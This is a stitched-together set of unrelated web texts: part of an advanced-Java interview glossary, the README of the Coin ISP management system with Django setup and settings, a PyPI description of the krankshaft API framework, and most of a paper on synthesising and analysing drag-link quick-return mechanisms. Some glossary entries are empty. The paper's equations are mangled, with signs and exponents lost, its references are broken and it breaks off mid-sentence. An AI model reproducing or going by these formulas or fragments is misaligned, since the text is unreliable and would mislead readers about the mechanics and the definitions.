103. 104.What is RAR ? Resource Adapter Archive. A JAR archive that contains a resource adapter module. 105.What is RDF ? Resource Description Framework. A standard for defining the kind of data that an XML file contains. Such information can help ensure semantic integrity-for example-by helping to make sure that a date is treated as a date rather than simply as text. 106.What is RDF schema ? A standard for specifying consistency rules that apply to the specifications contained in an RDF. 107.What is. 108.What is reentrant entity bean ? An entity bean that can handle multiple simultaneous, interleaved, or nested invocations that will not interfere with each other. 109.What is. 110.What is query string ? A component of an HTTP request URL that contains a set of parameters and values that affect the handling of the request. 111.What is queue ? A messaging system built on the concept of message queues. Each message is addressed to a specific queue; clients extract messages from the queues established to hold their messages. 112.What is registry ? An infrastructure that enables the building, deployment, and discovery of Web services. It is a neutral third party that facilitates dynamic and loosely coupled business-to-business (B2B) interactions. 113.What is remove method ? Method defined in the Home interface and invoked by a client to destroy an enterprise bean. 114.What is render kit ? A set of renderers that render output to a particular client. The JavaServer Faces implementation provides a standard HTML render kit, which is composed of renderers that can render HMTL markup. 115.What is registry provider ? An implementation of a business registry that conforms to a specification for XML registries (for example, ebXML or UDDI). 116.What is relationship field ? A virtual field of an entity bean having container-managed persistence; it identifies a related entity bean. 117.What is remote interface ? One of two interfaces for an enterprise bean. The remote interface defines the business methods callable by a client. 118.What is renderer ? A Java class that can render the output for a set of JavaServer Faces UI components. 119.
http://www.lessons99.com/advanced-java-interview-questions-16.html
CC-MAIN-2019-04
en
refinedweb
Système d'information du FAI ARN (repris de celui d ./venv To activate the virtualenv (you need to do this each time you work on the project): source ./venv/bin/activate Install dependencies. On Debian, you will probably need the python-dev, python-pip, libldap-dev, libpq-dev, libsasl2-dev, and libjpeg-dev packages. sudo apt-get install python-dev python-pip libldap2-dev libpq-dev libsasl2-dev libjpeg-dev libxml2-dev libxslt1-dev libffi-dev python-cairo libpango1.0-0 You need a recent pip for the installation of dependencies to work. If you don't meet that requirement (Ubuntu trusty does not), run: pip install "pip>=1.5.6" In any case, you then need to install coin python dependencies: pip install -r requirements.txt See the end of this README for a reference of available configuration settings. At this point, you should setup your database. You have two options. The official database for coin is postgresql. To ease developpement, a postgresql virtual-machine recipe is provided through vagrant. Note: Vagrant is intended for developpement only and is totaly unsafe for a production setup. Install requirements: sudo apt install virtualbox vagrant Then, to boot and configure your dev VM: vagrant up Default settings target that vagrant+postgreSQL setup, so, you don't have to change any setting. SQLite setup may be simpler, but some features will not be available, namely: To use sqlite instead of PostgreSQL, you have to override local settings with someting like: DATABASES = { # Base de donnée du SI 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': 'coin.sqlite3', 'USER': '', # Not needed for SQLite 'PASSWORD': '', # Not needed for SQLite 'HOST': '', # Empty for localhost through domain sockets 'PORT': '', # Empty for default }, } The first time, you need to create the database, create a superuser, and import some base data to play with: python manage.py migrate python manage.py createsuperuser python manage.py loaddata offers ip_pool # skip this if you don't use PostgreSQL There is a set of unit tests you can run with : DJANGO_SETTINGS_MODULE=coin.settings_test ./manage.py test LDAP-related tests are disabled by default. Setup LDAP parameters and activate LDAP in settings to make the LDAP tests run. Setup: pip install pytest-django Run: pytest. More filters are available, see the command's help for more details.. python manage.py offer_subscriptions_count: Returns subscription count grouped by offer type. python manage.py import_payments_from_csv: Import a CSV from a bank and match payments with services and/or members. At the moment, this is quite specific to ARN workflow. Lastly, it is possible to override all Coin templates (i.e. for user views and emails), see below. Coin sends mails, you might want to customize the sender address: DEFAULT_FROM_EMAILapp-wide setting DEFAULT_FROM_EMAILfor administrative emails (welcome email and membership fees), will take precedence (if filled). You may want to override some of the (HTML or email) templates to better suit your structure needs. Coin allows you to have a folder of custom templates that will contain your templates, which gets loaded prior to coin builtins. With this method, several templates can be overridden: coin/templates/ coin/<app_name>/templates/for all active applications EXTRA_TEMPLATE_DIRSsettings. For instance, in settings_local.py: EXTRA_TEMPLATE_DIRS = ('/home/coin/my-folder/templates',) Copy the template you want to override to the right place in your custom folder (that's the hard part, see the example). Example Say we want to override the template located at coin/members/templates/members/emails/call_for_membership_fees.html and we set EXTRA_TEMPLATE_DIRS = ('/home/coin/my-folder/templates',) in settings. Then make a copy of the template file (and customize it) at /home/coin/my-folder/templates/members/emails/call_for_membership_fees.html Good to go :-) Some apps are not enabled by default : You can enable them using the EXTRA_INSTALLED_APPS setting. E.g. in settings_local.py: EXTRA_INSTALLED_APPS = ( 'vpn', ) If you enable an extra-app after initial installation, make sure to sync database : ./manage.py migrate nb: extra apps are loaded after the builtin apps. List of available settings in your settings_local.py file. EXTRA_INSTALLED_APPS: See Customizing app list EXTRA_TEMPLATE_DIRS: See Customizing templates LDAP_ACTIVATE: See LDAP MEMBER_MEMBERSHIP_INFO_URL: Link to a page with information on how to become a member or pay the membership fee SUBSCRIPTION_REFERENCE: Pattern used to display a unique reference for any subscription. Helpful for bank wire transfer identification REGISTRATION_OPEN: Allow visitor to join the association by register on COIN ACCOUNT_ACTIVATION_DAYS: All account with unvalidated email will be deleted after X days MEMBERSHIP_REFERENCE: Template string to display the label the member should indicates for the bank transfer, default: "ADH-{{ user.pk }}" DEFAULT_MEMBERSHIP_FEE: Default membership fee, if you have a more complex membership fees policy, you could overwrite templates PAYMENT_DELAY: Payment delay in days for issued invoices ( default is 30 days which is the default in french law) MEMBER_CAN_EDIT_PROFILE: Allow members to edit their profiles HANDLE_BALANCE: Allows to handle money balances for members (False default) INVOICES_INCLUDE_CONFIG_COMMENTS: Add comment related to a subscription configuration when generating invoices MEMBER_CAN_EDIT_VPN_CONF: Allow members to edit some part of their vpn configuration DEBUG: Enable debug for development do not use in production : display stracktraces and enable django-debug-toolbar. To log 'accounting-related operations' (creation/update of invoice, payment and member balance) to a specific file, add the following to settings_local.py : from settings_base import * LOGGING["formatters"]["verbose"] = {'format': "%(asctime)s - %(name)s - %(levelname)s - %(message)s"} LOGGING["handlers"]["coin_accounting"] = { 'level':'INFO', 'class':'logging.handlers.RotatingFileHandler', 'formatter': 'verbose', 'filename': '/var/log/coin/accounting.log', 'maxBytes': 1024*1024*15, # 15MB 'backupCount': 10, } LOGGING["loggers"]["coin.billing"]["handlers"] = [ 'coin_accounting' ] For the rest of the setup (database, LDAP), see For real production deployment, see file DEPLOYMENT.md.
https://code.ffdn.org/ARN/coin
CC-MAIN-2019-04
en
refinedweb
A Web API Framework (with Django, ...) Project description A Web API Framework. Currently only supports Django, but designed to work for other frameworks with some modification. At some point, other framework support will be built in directly. Purpose krankshaft was designed to make the frustrating and unnecessarily complicated parts of Web APIs simple and beautiful by default. It’s built in layers that allow the programmer to easily opt-in/out of. From “Expose this model via a web api and handle all the details” to “hands off my API, I’ll opt-into the basics as I need them”. krankshaft is meant to be a framework to build Web APIs and grow with your application. Goals: - simple and concise - keep the simple things simple - enable complex APIs without getting in the way - HTTP return codes are important, dont abstract them away - fail early - performance - no global state - easily extendable - suggests a pattern, but doesnt restrict you to it - secure by default Example This is just a suggested file structure, there is no limitation here. In app/apiv1.py: from django.conf import settings from krankshaft import API apiv1 = API('v1', debug=settings.DEBUG) In app/views.py: from app.apiv1 import apiv1 as api @api def view(request): return api.serialize(request, 200, { 'key': 'value' }) At this point, you’ll still need to wire up the common routing for your framework. In Django, it looks something like this: In app/urls.py: from django.conf.urls import patterns, include, url urlpatterns += patterns('app.views', url('^view/$', 'view'), ) Resource example In app/api.py: from django.conf import settings api = API('v1', debug=settings.DEBUG) @api(url='^model/(?P<id>\d+)/$') class ModelResource(object): def get(self, request, id): ... def put(self, request, id): ... def delete(self, request, id): ... In app/urls.py: from django.conf.urls import patterns, include, url from .api import api urlpatterns = patterns('', url('^api/', include(api.urls)), ) This enables clients to make GET/PUT/DELETE requests to the endpoint: /api/v1/model/<id>/ If a POST is made, the client will receive the proper 405 response with the Allow header set to GET, PUT, DELETE. You can customize resources even more. You can define your own routing scheme: class ModelResource(object): ... def route(self, request, id): # this is approximately the default try: view = getattr(self, request.method.lower()) except AttributeError: return api.response(request, 405) else: return view(request, id) Or setup urls and multiple routes: class ModelResource(object): ... def get_list(self, request): ... def post_list(self, request): ... def put_list(self, request): ... def delete_list(self, request): ... def query(self, request): if request.method != 'POST': return api.response(request, 405, Allow='POST') ... def route(self, suffix, request, *args, **kwargs): # this is approximately the default try: view = getattr(self, request.method.lower() + suffix) except AttributeError: return api.response(request, 405) else: return view(request, *args, **kwargs) def route_list(self, request): return self.route('_list', request) def route_object(self, request, id): return self.route('', request, id) @property def urls(self): from django.conf.urls import patterns, url return patterns('', [ url(r'^model/$', api.wrap(self.route_list)), url(r'^model/query/$', api.wrap(self.query)), url(r'^model/(?P<id>\d+)/$', api.wrap(self.route_object)), ]) Or (instead of building your own) use the one built in: from krankshaft.resource import DjangoModelResource from app.models import Model from app.api import api @api class ModelResource(DjangoModelResource): model = Model This resource implementation should be ideal for _most_ situations, but you’re free to reimplement parts or all of it. It’s meant only as a pattern you can follow and is not required by the framework at all. What works - simple authentication/authorization schemes (not OAuth at the moment) - serialization of primitive types respecting HTTP Accept Header - abort (raise-like http response return) - throttling - resource routing - query application (ie: ?field__startswith=something&order_by=field) with pagination support - deep data validation - Django ORM based Model Resource (with model serialization/deserialization) - Optimistic Concurrency Control option (version_field) Todo - auto-documenting based on doc strings (plus bootstrap interactive UI) - caching - easy-etag support - flask support - OAuth (1 and 2) Project details Release history Release notifications Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/krankshaft/0.2.7/
CC-MAIN-2019-04
en
refinedweb
This action might not be possible to undo. Are you sure you want to continue? Ron P. Podhorodeski, Scott B. Nokleby and Jonathan D. Wittchen Robotics and Mechanisms Laboratory, Department of Mechanical Engineering, University of Victoria, PO Box 3055, Victoria, British Columbia, Canada, V8W 3P6 E-mail: [email protected]; [email protected]; [email protected] Abstract first. Keywords mechanism projects; design; analysis; synthesis Introduction Quick-return mechanisms Quick-return (QR) mechanisms feature different input durations for their working and return strokes. The time ratio (TR) of a QR mechanism is the ratio of the change in input displacement during the working stroke to its change during the return stroke. QR mechanisms are used in shapers, power-driven saws, and many other applications requiring a load-intensive working stroke in comparison to a low-load return stroke [1–3]. Several basic types of mechanism have a QR action. These include slider-crank mechanisms (e.g., see the offset slider-crank mechanism in Fig. 1a and the inverted slider-crank mechanisms, including the crank-shaper mechanism, in Fig. 1b and the Whitworth in Fig. 1c) and four-bar mechanisms (e.g., see the crank-rocker-driven piston in Fig. 2a and the drag-link-driven piston in Fig. 2b). Mechanism analysis techniques taught in a first course on the theory of mechanisms can be applied to evaluate the performance of QR mechanisms. Design of a mechanism, on the other hand, requires determining a mechanism to perform a desired task. For example, synthesis of a reciprocating QR device requires determination of a mechanism to produce a desired TR and a necessary stroke. Note that there is not necessarily a unique mechanism design for a particular task: many mechanism types (e.g., offset slider-crank, Whitworth, drag-link, etc.) may be capable of performing it. Even within one mechanism type, many different link-length combinations (perhaps an infinity of several dimensions [1]) may perform the required task. Choosing a type of mechanism for a task is called type synthesis. Selecting link lengths for a chosen type is referred to as dimensional synthesis [1–3]. When many International Journal of Mechanical Engineering Education 32/2 The task of a QR mechanism is simple to understand. etc. for example. mechanisms of various types and/or dimensions that satisfy the primary task exist. of minimum transmission angles. physical modelling. iterative.Quick-return mechanisms 101 Fig. Several techniques can be considered and developed by students to achieve the required synthesis task. Having a laboratory manual that briefly outlines different possible techniques.. and leaves the International Journal of Mechanical Engineering Education 32/2 . For example. graphical. minimum transmission angles. can be considered to isolate a preferred design. Several concepts of design and analysis can be illustrated by a QR mechanism project. (b) crank-shaper. of type and dimensional synthesis. and of computer-aided modelling programs. and analytical techniques can all be used to synthesize a desired mechanism. students can be exposed to concepts of kinematic analysis. (c) Whitworth. maximum accelerations. concerns such as mechanism size. 1 Slider-crank QR mechanisms: (a) offset slider-crank. AUs are assigned to the curriculum content of the courses within the program under consideration. Podhorodeski et al. and has allowed the assignment to the course of a significant percentage of accreditation units (AUs) for Engineering design [4]. student-applied technique open.1 The project described in this work is assigned to and completed by the students within the first four weeks of a first course on mechanism analysis. (b) draglink (crank-crank) as the driving mechanism. requires a creative algorithm-design process. the projects are strong on the creative. . Over the past 10 years at the Department of Mechanical Engineering. iterative and often open-ended process subject to constraints. It is a creative. basic sciences. (d) engineering design. This course occurs in the first term of third year. systems and processes to meet specific needs. along with similar technique-open projects on inertia modelling and on cam design. engineering sciences and complementary studies in developing elements. and subject-to-constraints aspects. Fig. has given the students a strong appreciation of mechanism analysis and design issues. P.’ While not strong on the complementary aspect. International Journal of Mechanical Engineering Education 32/2 . a variety of projects featuring different mechanism types have been used within a first course on the theory of mechanisms. 1 The Canadian Engineering Accreditation Board (CEAB) performs accreditation of all undergraduate engineering programmes in Canada. open-ended. (b) basic sciences. Currently AUs are divided between (a) mathematics. 2 Four-bar QR mechanisms: (a) crank-rocker as the driving mechanism. Quoting CEAB Accreditation Criteria and Procedures [4]: ‘Engineering design integrates mathematics. The QR project.102 R. . of a semestered four-year academic programme that leads to an accredited bachelor of engineering in mechanical engineering degree. iterative. . University of Victoria. and (e) complementary studies. (c) engineering sciences. 2b depicts a QR mechanism driven by a drag-link (also known as a crank-crank) linkage.Quick-return mechanisms 103 Outline of the content of the remaining sections First. 1b illustrates a typical configuration. 2a shows a piston being driven by the follower of a crank-rocker four-bar linkage. Quick-return mechanism types and synthesis techniques Example QR mechanisms Consider the offset slider-crank illustrated in Fig. a ‘cardboard and pin’ model) is made and the output for a given input is directly measured. Fig. Design of QR mechanisms After choosing a mechanism type. 1c) is formed when the crank of the slider-crank inversion is greater than the base distance. Note that the project requires application of analysis techniques taught very early within a first course on the theory of mechanisms. BDC). The subsequent section presents a typical set of requirements for the QR project. The crank length of a crank-shaper is less than the base length (O2 to O4) of the mechanism. types of QR mechanisms and potential techniques for their synthesis are reviewed. a scale model (e.g. Fig. Several techniques can be applied. appropriate dimensions for the desired task must be selected. requires the development of relevant synthesis techniques. moves from C¢ (top-dead-centre. where again the crank (member 2) is rotating counter-clockwise. From the oscillation extremes of the follower. The time ratio (TR) is given by: TR = a b (1) A crank-shaper is comprised of a tool driven by an inverted slider-crank. Examples of solution techniques that have been used to solve portions of the QR project are then presented. TDC) to C≤ (bottom-dead-centre. Notice that the follower (member 4) of the Whitworth is dragged through a full rotation during a revolution of the crank. Fig. 1c) define the values of a and b. 2b). C. The crank displacements when the follower is parallel to the sliding direction (horizontal in Fig. 1c illustrates a Whitworth QR mechanism. 1a. As the piston moves from BDC to TDC the crank rotates a displacement b (B≤ to B¢). the crank positions B¢ to B≤ are defined. The graphical technique involves drawing the mechanism in its various positions. A Whitworth mechanism (Fig. The most basic techniques are physical modelling and graphical. The extreme positions of the piston occur when the follower direction is parallel to the sliding direction (horizontal in Fig. and exposes students to the application of computer-based algorithms for the analysis of mechanisms. The crank displacements at these extremes define the values of a and b for the device’s TR. In physical modelling. The crank (member 2) is rotating clockwise and rotates a displacement a (B¢ to B≤) as the piston. International Journal of Mechanical Engineering Education 32/2 . The paper closes with further considerations and conclusions. Fig. Notice that the crank (member 2) is rotating counter-clock wise in this case and that the follower (member 4) of the driving mechanism (the inverted slider-crank) oscillates between two extremes. 1000 m. for the four-bar and to relocate pin C (length r5) on the follower to create a mechanism capable of performing the task requirements. 3. However.104 R. that it is not always possible to derive a closed-form solution for link lengths as a function of a desired TR. The length of the slider’s coupler is CD = r6 = 0. Furthermore.3000 m. however. An alternative is to derive analytical expressions for the mechanism lengths required for a desired TR. An example quick-return project The idea of this project is to expose students to concepts of mechanism synthesis and to provide a practical problem where analytical. 3 Layout of drag-link QR mechanism. but allows for modification of the project from year to year. if a closed-form solution for the displacements of the driving mechanism can be found. It should be noted that any QR mechanism type can be substituted for the presented drag-link-based one. a solution of the TR for given link lengths can be found iteratively. graphical. Example problem background An application requires a QR mechanism with TR = 1. Searching over the feasible link lengths allows mechanisms having desired TRs to be resolved.2750 m. An example project problem.2250 m. and length of follower O4B = r4 = 0.300 m. Podhorodeski et al. The current lengths of the drag-link mechanism are: distance between fixed centres O2 and O4 = r1 = 0. length of coupler AB = r3 = 0. It is proposed to design a new coupler.1000 m from O4. P. due to the nonlinear from of the TR solution. and the commercial program Working Model® [6]. it is suggested that the coupler should be adjustable in length for future modification of the drag-link-based QR for other TRs. for designing a drag-link-based QR mechanism. is given below. a program developed at the University of Manitoba and the University of Toronto. International Journal of Mechanical Engineering Education 32/2 .3000 m and it is connected a distance O4C = r5 = 0. The current drag-link crank and follower are made of cast iron and would be expensive to modify.500 and a stroke of 0. AB (length r3). length of crank O2A = r2 = 0. Currently a drag-link-based QR mechanism exists. as illustrated in Fig. Substituting different mechanism types allows the teaching objectives of the project to remain the same. Note. and computer-aided analysis techniques can be applied. Available for this project are two mechanism analysis programs: GNLINK [5]. Physical modelling and graphical solutions are time consuming and can be inaccurate. Fig. Quick-return mechanisms 105 Example project requirements Design (1) Determine a coupler link length (r3) and C pin location (r5) satisfying a TR = 1.500 and stroke = 0.500 and stroke = 0. and the coupler length could be changed? (4) Discuss the issues you would consider in the isolation of a unique mechanism design. Analysis For the mechanism with TR = 1. The following equations can be derived using cosine law: Fig. TR and stroke solutions for known link lengths The TDC and BDC positions of the piston occur when the follower of the drag-link four-bar mechanism is aligned with the sliding direction. using relative motion analysis (polygons).3000 m while maintaining the other current link lengths. International Journal of Mechanical Engineering Education 32/2 . Fig.0 rad/s2 for this analysis. The solutions presented are examples of various ways that past students have solved portions of the project.0 rad/s and a2 = 0. Use w2 = 10. (2) Determine the range of (r3) that the adjustable coupler should accommodate to allow the maximum number of drag-link-based TRs to be created. (3) Simulate the mechanism for a complete revolution of the input crank. 4 illustrates these two positions. Examples of quick-return project solutions Examples of solutions for various portions of the problem set out above are given in this section. O2O4.3000 m: (1) Evaluate the velocity and acceleration of the slider when q2 = 60 °. 4 Drag-link mechanism at TDC and BDC. (2) Check this result using the program GNLINK or Working Model®. Discussion issues (1) How many mechanisms providing a specific TR are possible if only r3 is varied? (2) What is the range of TR that would be possible by adjusting the length of the coupler? (3) How many feasible mechanism solutions would exist for a given TR if both the base length. depending on the value of r3.: rshort + rlong £ ra + rb and rshort = r1 (6) where rshort and rlong are the lengths of the shortest and the longest links. For TDC: r 2 = r 2 + (r4 + r1 ) . In summary. the feasible range of r3 can be found considering Grashof’s criteria [7] for a drag-link four-bar.1)p = q 2a + f TR + 1 (7) with f being equal to (TR .2250 + r3 and therefore 0. examination of the data indicates that TR values ranging 1. i. O4C = 0. i.q 2a + q 2 b = b p + q 2a . one.2250 m. 5.1000 m.r1 ) .1 + r3 0.2 r2 (r4 . Similarly.2750 0. Analysis of the values of the TR over the feasible r3 range using the given values of r1 = 0. For the project problem. stroke = 2 * O4C.. r2. there are either zero.1 + 0.e.r1 ) cos(q 2 b ) 2 3 2 2 2 2 (2a) (2b) Solving for q2a and q2b in the expressions for TDC and for BDC yields: q 2 a = cos -1 (r 2 + (r4 + r1 ) . is a solution for the TR of the device for known link lengths. Iterative solution for the value of r3 Equation (5).r 2 ) (2 r2 (r4 3 2 ) .2750 m yields the TR values illustrated in Fig.250 m. combined with equations (3a) and (3b). the duration of the working stroke is: a = p .r 2 ) (2 r2 (r4 + r1 )) 2 3 2 q 2 b = cos -1 ( ((r 2 2 + (r4 . For the given length values.538 can be achieved.a.106 R. For a desired TR. Podhorodeski et al.q 2a + q 2 b Since b = 2p .2 r2 (r4 + r1 ) cos(q 2 a ) 3 2 For BDC: r = r + (r4 .15 £ r3.500. r2 = 0. Searching the TR data used to create Fig. rlong will be equal to either r3 or r4. r4 = 0.2250 + 0.e. for the given values of r1.2750 and therefore r3 0.r1 ) .q 2 b (5) (4) The stroke of the drag-link-driven QR mechanism is double the length O4C.1500 m £ r3 £ 0. With r3 = rlong.3000 m. and r1 is the length between the base pins [1–3]. two values. r3 = 0. the TR can be found as: TR = a p . P. Analytical solution for the value of r3 Solving for q2b in terms of q2a and TR from equation (5) gives: q 2 b = q 2a + (TR .1500 m. 5.154 m and r3 = 0.r ))) 1 (3a) (3b) In terms of q2a and q2b. r4 = rlong yields 0.4000 m yield drag-link mechanisms.430 TR £ 5. or two feasible solutions for r3.1)p/(TR + 1). are found to yield the desired TR = 1.40. ra and rb are the lengths of the other two links. International Journal of Mechanical Engineering Education 32/2 . Again. and r4. substituting the known length values into equation (6) yields 0. values of r3 in the range 0. For the desired stroke of 0. 2 r2 (r4 + r1 ) cos(q 2 a ) = r 2 + (r4 .2 r2 (r4 .sin f sin q 2 a ] = 2 r4 r1 r2 (10) Letting A = (r4 + r1) . B = (r4 .: International Journal of Mechanical Engineering Education 32/2 . and C = 2r4r1/r2 allows equation (10) to be expressed as: A cos q 2 a + B sin q 2 a = C which has the following q2a solutions [9]: q 2 a = atan 2(B.Quick-return mechanisms 107 Fig. With q2a known.r1 ) cos(q 2 b ) 2 2 2 2 (8) Cancelling the common r22 term. Equating the right-hand sides of equations (2a) and (2b) eliminates r3 and yields: r 2 + (r4 + r1 ) .r1) sin f. two solutions for q2a can be resolved.(r4 .C 2.r1 )[cos f cosq 2 a .2 r2 (r4 . equation (2b) can be solved for r3. From equation (11). 5 TR values for feasible range of r3.(r4 .r1) cos f.e.r1 ) . substituting for q2b from equation (7). A) ± atan 2( A 2 + B 2 . C) (12) (11) where atan 2 (numerator.(r4 . i. if A2 + B2 > C2. equation (9) becomes: (r4 + r1 ) cosq 2 a .r1 ) 2 2 (9) Simplifying and using the angle sum relationship for cosine [8].r1 ) cos(q 2 a + f ) = (r4 + r1 ) . and grouping the cosine terms on the left-hand side gives: 2 r2 (r4 + r1 ) cos q 2 a . denominator) denotes a quadrant corrected arctangent function. one. 6 Force transmission angles at: (a) TDC and (b) BDC. depending on the desired TR value. r3 = ± r 2 + (r4 + r1 )2 . i. to prevent binding of the links.2504 m. The minimum and maximum transmission angles for a drag-link mechanism occur when the follower is aligned with the base link.C2 = 0. there is only one solution for q2a and therefore only one potential solution for r3. 6a.500 and the given length values. A minimum transmission angle of 30° has been suggested [1].18° or 39.e. for the illustrated draglink-based QR mechanism the minimum/maximum transmission angles occur at TDC and BDC.: r 2 = r 2 + (r4 + r1 ) . Referring to Fig.1544 m or 0. An ideal transmission angle is 90°. These results confirm the r3 results found iteratively above..2 r3 (r4 + r1 ) cosg TDC 2 3 2 (14) Fig. respectively. P. Selecting the preferred value for r3 The transmission angle of a mechanism determines the effectiveness it will have in driving its payload.38° and r3 = 0. gTDC. or two solutions for r3. i. When C2 > A2 + B2 there is no real solution for q2a and therefore no solution for r3. Therefore.108 R. The solutions for r3. Therefore. if A2 + B2 > C2. however. higher transmission angles are preferred. International Journal of Mechanical Engineering Education 32/2 . In any case. there may be zero. When A2 + B2 . can be resolved through cosine law. two feasible solutions for r3 can exist. Substituting the specified TR = 1.2 r2 (r4 + r1 ) cos(q 2 a ) 2 (13) The negative solutions for r3 can be neglected since it is physically impossible to have a negative link length. as has 45° [2. must be tested to ensure that they satisfy the Grashof criteria for a drag-link four-bar mechanism (Equation (6)).e. Podhorodeski et al. 3]. the transmission angle at TDC. we find q2a = 6. Using relative velocity analysis: r r r (18) VB = VA + VB A r r r (19) VD = VC + VD C The relative velocity equations above are solved in sequence and each has two unknown quantities. (4) As seen in solving for the preferred value of r3. O4B = r4 = 0. exists for the range of feasible r3 lengths in drag-link mechanisms. either zero.1544 = min(10. r3 = 0. w2 = 10 rad/s.49°. BDC yields: r 2 = r 2 + (r4 . yield gminr3=0. Therefore. were adjustable. a single order of infinity of solutions would exist for a given TR. a2 = 0 rad/s2.47° and gminr3=0. 5. O2A = r2 = 0.2750 m. 7a depicts the mechanism with the link lengths required to achieve a TR = 1.94°) = 10. 7b.2504 m. (3) If both the base length O2–O4 and the coupler length. Table 2 summarizes the magnitudes found from Fig. 60. one. gBDC). 1.430 TR £ 5. The unknowns may be resolved using the graphical method shown in Fig. Discussion issues (1) As seen by the TR calculations for potential r3 values in Fig.3000 m.Quick-return mechanisms 109 and therefore: Ê r 2 + (r4 + r1 )2 .538.60°.60°. Solving for the slider acceleration Using relative acceleration analysis: International Journal of Mechanical Engineering Education 32/2 . The known link lengths and the found values.2504 m is the preferred solution.2 r3 (r4 . r3. the minimum transmission angle can be critical in the isolation of a unique mechanism design. depending on the desired TR value. with reference to Fig.r 2 ˆ 3 2 g TDC = cos -1 Á ˜ 2 r3 (r4 + r1 ) ¯ Ë Similarly.r1 ) cosg BDC 2 3 giving: Ê r 2 + (r4 .83°) = 35. O4C = r5 = 0.1544 m and 0.r1 ) ¯ Ë (17) 2 (15) (16) The minimum transmission angle is gmin = min(gTDC.2504 = min(35. Analysis of the kinematics Solving for the slider velocity Known: q2 = 60°.2504 m. Table 1 describes the known and unknown vector components for the equations. r3 = 0. and CD = r6 = 0. Fig.500.r 2 ˆ 3 2 g BDC = cos -1 Á ˜ 2 r3 (r4 . AB = r3 = 0.r1 ) . or two r3 values may exist. In Table 1 the symbol ^ is used to denote perpendicular and the symbol ? is used to denote an unknown quantity. (2) A range of TR values. 7b.1500 m.2250 m.r1 )2 . 6b. 85. . Table 3 describes the known and unknown vector comInternational Journal of Mechanical Engineering Education 32/2 . ^ to O 2 A) ^ to AB ^ to O 4 B r Same direction as VB ^ to DC Horizontal (sliding direction) Velocity r VA r VB/A r VB r VC r VD/C r VD Magnitude (m/s) (|w2|)O2A = 2.110 R. P. Podhorodeski et al.250 ? ? Found by velocity image ? ? r aB rn rt aB + aB r aD rn rt aD + aD r r = aA + aB A rn r rn rt = a A + a tA + a B A + a B A r r = aC + aD C rn rt rn rt = aC + aC + aD C + aD C (20) (21) The relative acceleration equations above are solved in sequence and each has two unknown quantities. TABLE 1 Known and unknown velocity components Direction 150 ° (i.e. Fig. (b) velocity polygon and (c) acceleration polygon. 7 Analysis of kinematics at q2 = 60 °: (a) required drag-link QR mechanism. and acceleration of vector 2 are the mechanism’s inputs. the magnitude of an is 21. to those found graphically using AutoCAD® above (Fig.7 m/s2. 7). to three significant figures. International Journal of Mechanical Engineering Education 32/2 .68 r aB // to CD (directed towards C) r ponents for the equations. For Table 3 it has been noted that the magnitude of atA rn is zero since a2 = 0 rad/s2 and that the magnitude of aD is also zero since the piston D slides on a straight surface. 7c. the angular displacement. Measuring from Fig. Computer-aided analysis The drag-link-driven QR mechanism is a two-loop. velocity. Results from GNLINK are presented.39 ? ? Found by acceleration image r || VD/C||2/CD = 8.Quick-return mechanisms 111 TABLE 2 Velocity r VB/A r VB r VC r VD/C r VD Velocity magnitudes Magnitude (m/s) 1.898 3. With this model.631 1. single-input mechanism. 7c. as illustrated in Figure 8a.075 TABLE 3 Acceleration Known and unknown acceleration components Magnitude (m/s2) Direction // to O2A (directed towards O2) // to AB (directed towards A) ^ to AB // to O 4 B (directed towards O4) ^ to O 4 B Same direction as ^ to CD Horizontal (sliding direction) rn aA r an r B/A t a B/A rn aB rt aB r aC r an r D/C t a D/C rt aD w2 * O2A = 22. with its direction D being to the left. Figure 8b shows a simulation of the mechanism through a full rotation. The unknowns may be solved for using the graphical construction shown in r Fig. Vectors can be used to represent the mechanism’s links.756 1.50 2 r || VB/A||2/AB = 14. Table 5 presents kinematic results output for q2 = 60°.219 1. The results are identical. The mechanism has been simulated on GNLINK and Working Model®. Table 4 summarizes the vector model used to model the mechanism.87 ? ? r || VB||2/O4B = 37. 5430E+01 -.7566E+01 -. 1 2 Primary 4 GNLINK model of the drag-link QR mechanism Length .5118E+02 .1500E+00 .4313E+00 . 1 Loop Sequences Loop No.4541E+02 -.1047E+01 .4296E+00 In1D Dep 2D Dep 4D . Podhorodeski et al.6000E+02 -.3247E+00 .0000E+00 .2931E+01 .0000E+00 Vector No. 3 4 6 7 A or L A A A L Secondary 5 A or L A Difference .3000E+00 Angle .112 R. TABLE 4 Initial Vector Information Vector No. P.3000E+02 .3000E+02 .1000E+00 .2750E+00 .1169E+02 -. TIME In1 Dep 2 Dep 4 T = . 1 2 3 4 Common Variable Pairs Pair No. 1 2 3 4 5 6 7 Dependent Variables Dependent Variable No.3000E+00 .0000E+00 . Print out may be paused by pressing <Ctrl S>.0000E+00 Sequence 2 5 3 -6 -4 -7 -1 TABLE 5 GNLINK kinematic results for q2 = 60 ° Results are tabulated using the following format.1600E+03 .3000E+02 .2250E+00 .1074E+01 In1DD Dep 2DD Dep 4DD .2504E+00 .2167E+02 Dep 1 Dep 3 Dep 1D Dep 3D Dep 1DD Dep 3DD -. To start print out press <CR>.4400E+02 International Journal of Mechanical Engineering Education 32/2 .1000E+02 .0000E+00 -. and CAMPRF [10] a cam-profile-design program. approximately 60% of the students utilize such packages and achieve similar accuracy. students are currently scheduled to complete the following four lab projects: (1) (2) Design and analysis of a QR mechanism. including the drag-link-based QR. which allows the construction and running of different mechanism types. Also found in the laboratory are a cut-away five-speed manual transmission and various scales and knife edges to allow the determination of the inertia properties of links. the program used in this work. In addition. including GNLINK. 8 GNLINK results: (a) vector model of the drag-link QR mechanism. While not mandatory. Over the 13 weeks of the term. the laboratory has several PCbased computers running mechanism simulation software. Further considerations On the accuracy of the graphical velocity and acceleration solutions The high accuracy achieved in the graphical analysis of velocity and acceleration values is due to the use of a computer-aided drawing package. Each group has access to the laboratory for approximately one hour per week. On theory of mechanisms laboratory and the format and value of the labs The laboratory used for the theory of mechanisms class has a reconfigurable mechanism testbed.Quick-return mechanisms 113 Fig. (b) motion simulation of the mechanism. International Journal of Mechanical Engineering Education 32/2 . Approximate modelling and physical determination of inertia properties. Students are divided into groups of three for the laboratories. On the manual for the QR project The laboratory manual for the QR project basically consists of the information found within the introductory sections to this paper. Theory of Machines and Mechanisms. [10] W. Proc. J. ‘Disc cam design using a microcomputer’. Erdman and G. Since the task of a QR mechanism and the kinematic analysis involved in the project are basic. Uicker. Toronto. Don Mills. G. Podhorodeski et al. Cleghorn. [8] D. Conclusions Having a project related to QR mechanism design and analysis is very beneficial to 